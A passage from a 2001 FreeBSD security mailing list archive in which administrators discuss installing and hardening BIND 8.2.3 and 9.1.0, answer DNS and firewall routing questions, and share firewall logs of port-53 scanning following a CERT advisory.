the correct place of the port for FreeBSD-3.4? 2) if i have fresh src from ftp.isc.org (actually isrv4.pa.vix.com, right?) then can i compile it without using patches in port collection? and is there some changes about host ftp.FreeBSD.org? today my nslookup don't see it from here althou i didn't any changes... can you tell me the ip i can use instead? -- Yuri To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 19:27:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 2C43037B69E for ; Tue, 30 Jan 2001 19:27:24 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 90A36BA2B4; Tue, 30 Jan 2001 19:27:54 -0800 (PST) Date: Tue, 30 Jan 2001 19:27:54 -0800 From: Kris Kennaway To: "Yuri A. Wolf" Cc: freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 - where is the correct place to download src? Message-ID: <20010130192754.A54972@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="1yeeQ81UyVL57Vl7" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from subs@ovk.altai.ru on Wed, Jan 31, 2001 at 09:23:06AM +0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --1yeeQ81UyVL57Vl7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 31, 2001 at 09:23:06AM +0600, Yuri A. Wolf wrote: > Greetings. >=20 > I began to read and tried to make new bind8.2.3 from yesterday > evening. All failed in different places... Today morning haven't cleared > the main thing for me: >=20 > 1) where is the correct place of the port for FreeBSD-3.4? /usr/ports/net/bind8 > 2) if i have fresh src from ftp.isc.org (actually isrv4.pa.vix.com, > right?) then can i compile it without using patches in port collection? It works, but if you don't use the port then you can't uninstall it, etc. > and is there some changes about host ftp.FreeBSD.org? today my nslookup > don't see it from here althou i didn't any changes... can you > tell me the ip i can use instead? xor# host ftp.freebsd.org ftp.freebsd.org is a nickname for ftp.freesoftware.com ftp.freesoftware.com has address 216.66.64.162 Kris --1yeeQ81UyVL57Vl7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6d4Y6Wry0BWjoQKURAv4RAKCNAkOJv/t6H/zafScBLpIhmm1viACgyliU So0UgNLSBXw6sKLgfqRv9nU= =aU7M -----END PGP SIGNATURE----- --1yeeQ81UyVL57Vl7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 19:46: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id 1AC4D37B6A4 for ; Tue, 30 Jan 2001 19:45:40 -0800 (PST) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id JAA39133 for ; Wed, 31 Jan 2001 09:45:37 +0600 (NOVT) (envelope-from subs@ovk.altai.ru) Date: Wed, 31 Jan 2001 09:45:37 +0600 (NOVT) From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: freebsd-security@FreeBSD.org Subject: Re: bind8.2.3 - where is the correct place to download src? In-Reply-To: <20010130192754.A54972@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > 1) where is the correct place of the port for FreeBSD-3.4? > > /usr/ports/net/bind8 ;-) i meant the place at ftp.freebsd.org where the port is. yesterday i downloaded the new port (with patches of course), but there was an error during patching (patch-ac). the sources were from ftp.isc.org, and i putted them into distfiles, so there wasn't mistake as i think... > > 2) if i have fresh src from ftp.isc.org (actually isrv4.pa.vix.com, > > right?) then can i compile it without using patches in port collection? > It works, but if you don't use the port then you can't uninstall it, etc. so, if i do that, i don't need pathches located in ports, right? or? > > and is there some changes about host ftp.FreeBSD.org? today my nslookup > > don't see it from here althou i didn't any changes... can you > > tell me the ip i can use instead? > xor# host ftp.freebsd.org > ftp.freebsd.org is a nickname for ftp.freesoftware.com > ftp.freesoftware.com has address 216.66.64.162 strange... my named logs that: Jan 31 08:54:10 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [207.90.181.81].53 'WHO2.CDROM.COM' Jan 31 08:54:11 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [204.216.27.3].53 'WHO.CDROM.COM' Jan 31 08:57:22 proxy named[37568]: ns_forw: query(ftp.freesoftware.com) All possible A RR's lame Jan 31 09:04:51 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [204.216.27.3].53 'WHO.CDROM.COM' Jan 31 09:04:52 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [207.90.181.81].53 'WHO2.CDROM.COM' Jan 31 09:11:07 proxy named[37568]: ns_forw: query(ftp.freesoftware.com) All possible A RR's lame Jan 31 09:23:36 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [207.90.181.81].53 'WHO2.CDROM.COM' Jan 31 09:23:36 proxy named[37568]: Lame server on 'ftp.freesoftware.com' (in 'FREESOFTWARE.COM'?): [204.216.27.3].53 'WHO.CDROM.COM' etc... > Kris -- Yuri To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 19:53: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id B749E37B6AC for ; Tue, 30 Jan 2001 19:52:39 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id B492EBA2B4; Tue, 30 Jan 2001 19:53:09 -0800 (PST) Date: Tue, 30 Jan 2001 19:53:09 -0800 From: Kris Kennaway To: "Yuri A. Wolf" Cc: freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 - where is the correct place to download src? Message-ID: <20010130195309.A55305@xor.obsecurity.org> References: <20010130192754.A54972@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7AUc2qLy4jB3hD7Z" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from subs@ovk.altai.ru on Wed, Jan 31, 2001 at 09:45:37AM +0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --7AUc2qLy4jB3hD7Z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jan 31, 2001 at 09:45:37AM +0600, Yuri A. Wolf wrote: > i meant the place at ftp.freebsd.org where the port is. yesterday i > downloaded the new port (with patches of course), but there was an error > during patching (patch-ac). the sources were from ftp.isc.org, and i > putted them into distfiles, so there wasn't mistake as i think... www.freebsd.org/ports - fairly obvious location, eh? :) > > > 2) if i have fresh src from ftp.isc.org (actually isrv4.pa.vix.com, > > > right?) then can i compile it without using patches in port collectio= n? >=20 > > It works, but if you don't use the port then you can't uninstall it, et= c. >=20 > so, if i do that, i don't need pathches located in ports, right? or? Patches in ports are typically used to work around inconsistencies with the FreeBSD environment, to fix bugs and build errors. In this case I don't think the patches do much functionally, you can check for yourself. Kris --7AUc2qLy4jB3hD7Z Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6d4wlWry0BWjoQKURAlbgAJ403FMDBhleOusosU7L/47CniFmlQCgvajr 5tDcxKkq4myIPo4gk9RApJk= =zHWw -----END PGP SIGNATURE----- --7AUc2qLy4jB3hD7Z-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 19:56:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id C5B8137B6B1 for ; Tue, 30 Jan 2001 19:56:13 -0800 (PST) Received: from localhost (marquis@localhost) by roble.com with ESMTP id f0V3uD411610 for ; Tue, 30 Jan 2001 19:56:13 -0800 (PST) Date: Tue, 30 Jan 2001 19:56:13 -0800 (PST) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: Bind: unapproved query (version.bind) Script kiddies? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David La Croix wrote: > It's not so much blocking queries to version.bind, so much as refusing to > answer queries to an untrusted host, about domains it does not host. Alternately, you could define the "allow-recursion" and "version" options: options { directory "/etc/namedb"; version "none.of.your.business"; pid-file "/var/run/named.pid"; listen-on { localhost; YOUR_IP; }; query-source address YOUR_IP port 53; transfer-source YOUR_IP; allow-recursion { localhost; YOUR_SUBNET; }; }; -- Roger Marquis Roble Systems Consulting http://www.roble.com/ > options { > directory "/etc/namedb"; > allow-query { > 127.0.0.1; > localnets; > }; > allow-transfer { > 0.0.0.0; /* IPs changed */ > 0.0.0.0; /* secondary DNS servers */ > }; > forwarders { > 0.0.0.0; 0.0.0.0; > }; > }; > > and then further down all my zone definitions look like: > > zone "mydomain.com" { > type master; > file "zones/mydomain.com"; > allow-query { any; }; > }; > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 19:59:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id E93BD37B6CF for ; Tue, 30 Jan 2001 19:59:28 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id QAA69612; Wed, 31 Jan 2001 16:59:26 +1300 (NZDT) Message-Id: <200101310359.QAA69612@ducky.nz.freebsd.org> From: "Dan Langille" Organization: novice in training To: "Dan Langille" Date: Wed, 31 Jan 2001 16:59:21 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: bind 9.1.0 (was Re: bind8.2.3 and installation problem) Reply-To: dan@langille.org Cc: security@FreeBSD.ORG In-reply-to: <200101301955.IAA67144@ducky.nz.freebsd.org> References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 31 Jan 2001, at 8:55, Dan Langille wrote: > Thanks. For those that want to know, and I know you're out there: > > make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb > DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin > DESTHELP=/usr/share/misc install > > I didn't use any of the other options... > > After the install, the /etc/named.conf symlink was no longer needed. > ndc reload seems to be fine. I'll do some more testing later (there's not > actually any zones loaded on this box). After hearing claims that 9.1.0 was harder to configure and then hearing it was quite straight forward, I decided to try this myself. Using the above make command for bind9, I tried the latest and greatest. It compiled cleanly, but it looks for named.conf in a place I hadn't considered: /usr/etc/named.conf. What option did I miss? after "/usr/sbin/named -u bind", this was found in /var/log/messages: starting BIND 9.1.0 -u bind /usr/etc/named.conf: open: file not found loading configuration: file not found exiting (due to fatal error) Also of note: the -g option is gone in 9. -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 20: 9:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id 4DADF37B503 for ; Tue, 30 Jan 2001 20:09:00 -0800 (PST) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id KAA39709 for ; Wed, 31 Jan 2001 10:08:58 +0600 (NOVT) (envelope-from subs@ovk.altai.ru) Date: Wed, 31 Jan 2001 10:08:58 +0600 (NOVT) From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: freebsd-security@FreeBSD.org Subject: Re: bind8.2.3 - where is the correct place to download src? In-Reply-To: <20010130195309.A55305@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jan 2001, Kris Kennaway wrote: > On Wed, Jan 31, 2001 at 09:45:37AM +0600, Yuri A. Wolf wrote: > > > i meant the place at ftp.freebsd.org where the port is. yesterday i > > downloaded the new port (with patches of course), but there was an error > > during patching (patch-ac). the sources were from ftp.isc.org, and i > > putted them into distfiles, so there wasn't mistake as i think... > > www.freebsd.org/ports - fairly obvious location, eh? :) yeah I know that, I was there hundreds times... actually I just checked there is bind-8.2.2.p7 in title at http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org that's why i asked well, i'll try to download and make port again... but I'm not sure changes made... and in any case something strange that i can't nslookup ftp.FreeBSD.org... freefall, mx1 etc they are all nslookups in right way, and yesterday there wasn't problem with it... a sort of attack or paranoya? > Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 20:10: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from virtual-voodoo.com (virtual-voodoo.com [204.120.165.254]) by hub.freebsd.org (Postfix) with ESMTP id B2D1837B67D for ; Tue, 30 Jan 2001 20:09:45 -0800 (PST) Received: (from steve@localhost) by virtual-voodoo.com (8.11.2/8.11.1) id f0V49eW13820; Tue, 30 Jan 2001 23:09:40 -0500 (EST) (envelope-from steve) Date: Tue, 30 Jan 2001 23:08:25 -0500 From: Steve Ames To: Dan Langille Cc: security@FreeBSD.ORG Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem) Message-ID: <20010130230825.A62054@virtual-voodoo.com> References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101310359.QAA69612@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 04:59:21PM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 04:59:21PM +1300, Dan Langille wrote: > starting BIND 9.1.0 -u bind > /usr/etc/named.conf: open: file not found > loading configuration: file not found > exiting (due to fatal error) If you load BIND 9.1.0 straight out of /usr/ports/net/bind9 it seems to want /usr/local/etc/named.conf ... that makes some sense. /usr/etc is just shady :) > > Also of note: the -g option is gone in 9. -g does something else now... very confusing. Lastly... is this really a -security topic? Perhaps -isp or -questions is more appropriate? -Steve > > -- > Dan Langille > pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 21:17:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id 8DE7B37B6A6 for ; Tue, 30 Jan 2001 21:17:27 -0800 (PST) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id LAA53593 for ; Wed, 31 Jan 2001 11:17:15 +0600 (NOVT) (envelope-from subs@ovk.altai.ru) Date: Wed, 31 Jan 2001 11:17:15 +0600 (NOVT) From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: freebsd-security@FreeBSD.ORG Subject: It works! ;-) (Was: Re: bind8.2.3 - where is the correct place to download src?) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > actually I just checked there is bind-8.2.2.p7 in title at > http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org > > that's why i asked > well, i'll try to download and make port again... but I'm not sure changes > made... They were made ;-))) Just repeated that one procedure made yesterday, all works - there wasn't any error! Thanks guys! ;-)) -- Yuri To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 21:18:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 76B1837B6A7 for ; Tue, 30 Jan 2001 21:18:07 -0800 (PST) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 30 Jan 2001 21:16:17 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0V5Hss14716; Tue, 30 Jan 2001 21:17:54 -0800 (PST) (envelope-from cjc) Date: Tue, 30 Jan 2001 21:17:53 -0800 From: "Crist J. Clark" To: Mason Harding Cc: freebsd-security@FreeBSD.ORG Subject: Re: Revised: My FreeBSD Firewall Message-ID: <20010130211753.N91447@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <980823154.3a762c72329fd@mail.marketnews.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from mharding@marketnews.com on Tue, Jan 30, 2001 at 08:14:23AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 30, 2001 at 08:14:23AM -0800, Mason Harding wrote: > I am now just trying to implement a FreeBSD firewall, say with the IP > address of 172.16.5.2, with the router being 172.16.5.1, and the network > being 172.16.5.0/24. How can I handle the routing on this? my routing > table is basically as such... > > Destination Gateway Netif > default 172.16.5.1 fxp0 > 172.15.5 link#1 fxp1 > 172.16.5.1 0:0:c:80:f:30 fxp0 > 172.15.5.2/32 link#1 fxp0 > > I can ping 172.16.5.1 with success, but if I try to ping anything past it(on > the internet) I get no response. I can also ping anything on the LAN. Am I > going about implementing this firewall correctly? Should I not just be > adding a static route for 172.16.5.1? Sorry if this made no since. You want to do bridging, not routing, if you do this since you want to have the same network on both sides of the firewall. However, you are probably better off changing the IP address of the router and the external interface of the firewall to RFC1918 numbers and then have 172.16.5.0/24 on the internal network. You can then do routing to move the traffic. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 22:20:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ens1.bridges.com (unknown [139.142.87.3]) by hub.freebsd.org (Postfix) with ESMTP id 5A32437B491 for ; Tue, 30 Jan 2001 22:20:06 -0800 (PST) Received: from bites.bridges (bites [10.18.3.27]) by ens1.bridges.com (8.11.0/8.11.0) with ESMTP id f0V6GBX25601; Tue, 30 Jan 2001 22:16:11 -0800 (PST) Received: from nasty (aogg501ky45ql.bc.hsia.telus.net [216.232.155.1]) by bites.bridges with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id D7M66Q1Z; Tue, 30 Jan 2001 22:16:13 -0800 Message-ID: <006501c08b4d$0dbbad80$019be8d8@nasty> From: "Craig Skelton" To: "Steve Ames" , "Dan Langille" Cc: References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org> <20010130230825.A62054@virtual-voodoo.com> Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem) Date: Tue, 30 Jan 2001 22:14:16 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org http://www.cert.org/advisories/CA-2001-02.html yup. ----- Original Message ----- From: "Steve Ames" To: "Dan Langille" Cc: Sent: Tuesday, January 30, 2001 8:08 PM Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem) > On Wed, Jan 31, 2001 at 04:59:21PM +1300, Dan Langille wrote: > > starting BIND 9.1.0 -u bind > > /usr/etc/named.conf: open: file not found > > loading configuration: file not found > > exiting (due to fatal error) > > If you load BIND 9.1.0 straight out of /usr/ports/net/bind9 it seems > to want /usr/local/etc/named.conf ... that makes some sense. > > /usr/etc is just shady :) > > > > > Also of note: the -g option is gone in 9. > > -g does something else now... very confusing. > > Lastly... is this really a -security topic? Perhaps -isp or -questions > is more appropriate? > > -Steve > > > > > -- > > Dan Langille > > pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 0:43: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id E5E3637B65D for ; Wed, 31 Jan 2001 00:42:39 -0800 (PST) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id AAA17048; Wed, 31 Jan 2001 00:42:34 -0800 (PST) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <200101310842.AAA17048@gndrsh.dnsmgr.net> Subject: Re: Bind: unapproved query (version.bind) Script kiddies? In-Reply-To: <200101302245.RAA12443@cowpie.acm.vt.edu> from David La Croix at "Jan 30, 2001 04:45:04 pm" To: dlacroix@cowpie.acm.vt.edu (David La Croix) Date: Wed, 31 Jan 2001 00:42:34 -0800 (PST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Given I just saw 208.44.147.11 pile up in my logfiles I can say we have an active script kiddy. He is seaching for broken named's and hitting large areas of ip space (this is just one burst in my logs:) /var/log/security.0.gz:Jan 30 07:45:46 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3120 X.X.X.0:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:46 br1 /kernel: ipfw: 10532 Accept TCP 208.44.147.11:3124 X.X.X.4:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:48 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3501 X.X.X.127:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:48 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3584 X.X.X.159:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:48 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3585 X.X.X.160:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3717 X.X.X.191:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3718 X.X.X.192:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3901 X.X.X.223:53 in via ng0 /var/log/security.0.gz:Jan 30 07:45:49 br1 /kernel: ipfw: 650 Deny TCP 208.44.147.11:3902 X.X.X.224:53 in via ng0 > I just noticed the following in my logfiles: (/var/log/messages) > > it was running Bind 8.2.2- > > Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.11].1584 > for "version.bind" > [repeat 23 more times from the same IP] > > Jan 27 01:44:42 mildred named[41908]: unapproved query from [208.139.163.15].273 > 4 for "version.bind" > [repeat 32 more times from the same IP] > > Could this be script kiddie activity? This was before I upgraded to 8.2.3, > and before the CERT alert came out. > > What I don't get is why the unapproved query repeated so many times, within > (according to the timestamp) 3 seconds on both occasions. > > I will note: this activity goes back through about November of 2000, seemingly from different IP addresses. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 2:23:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id C4D5F37B491; Wed, 31 Jan 2001 02:23:10 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA24880; Wed, 31 Jan 2001 11:23:05 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: chet@po.cwru.edu Cc: roam@orbitel.bg, patrick@netzuno.com, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Bash2 removes SSH_CLIENT from the environment References: <1010130150609.AA70020.SM@nike.INS.CWRU.Edu> From: Dag-Erling Smorgrav Date: 31 Jan 2001 11:23:04 +0100 In-Reply-To: Chet Ramey's message of "Tue, 30 Jan 2001 10:06:09 -0500" Message-ID: Lines: 10 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Chet Ramey writes: > Bash uses the presence of SSH_CLIENT to decide whether or not to run the > shell startup files for a non-interactive shell (like it attempts to do > for rsh). [...] Feh. Here's a nickel, kid, get yourself a real shell. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 2:25:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 7F0A437B491 for ; Wed, 31 Jan 2001 02:25:09 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA24891; Wed, 31 Jan 2001 11:25:03 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Craig Skelton" Cc: "Steve Ames" , "Dan Langille" , Subject: Re: bind 9.1.0 (was Re: bind8.2.3 and installation problem) References: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> <200101301955.IAA67144@ducky.nz.freebsd.org> <200101310359.QAA69612@ducky.nz.freebsd.org> <20010130230825.A62054@virtual-voodoo.com> <006501c08b4d$0dbbad80$019be8d8@nasty> From: Dag-Erling Smorgrav Date: 31 Jan 2001 11:25:02 +0100 In-Reply-To: "Craig Skelton"'s message of "Tue, 30 Jan 2001 22:14:16 -0800" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Craig Skelton" writes: > > Lastly... is this really a -security topic? Perhaps -isp or -questions > > is more appropriate? > http://www.cert.org/advisories/CA-2001-02.html Yes, "multiple vulnerabilities in BIND" is a security topic, but "how to install and configure BIND 9" is not. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 31 2:25:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from klapaucius.zer0.org (klapaucius.zer0.org [204.152.186.45]) by hub.freebsd.org (Postfix) with ESMTP id 2D07937B684; Wed, 31 Jan 2001 02:25:27 -0800 (PST) Received: by klapaucius.zer0.org (Postfix, from userid 1001) id CF2FF239AAD; Wed, 31 Jan 2001 02:25:26 -0800 (PST) Date: Wed, 31 Jan 2001 02:25:26 -0800 From: Gregory Sutter To: Ade Lovett Cc: Rasputin , freebsd-security@freebsd.org, imp@village.org Subject: Re: OpenSSH b0rked (was RE: Problems with IPFW patch) Message-ID: <20010131022526.B656@klapaucius.zer0.org> References: 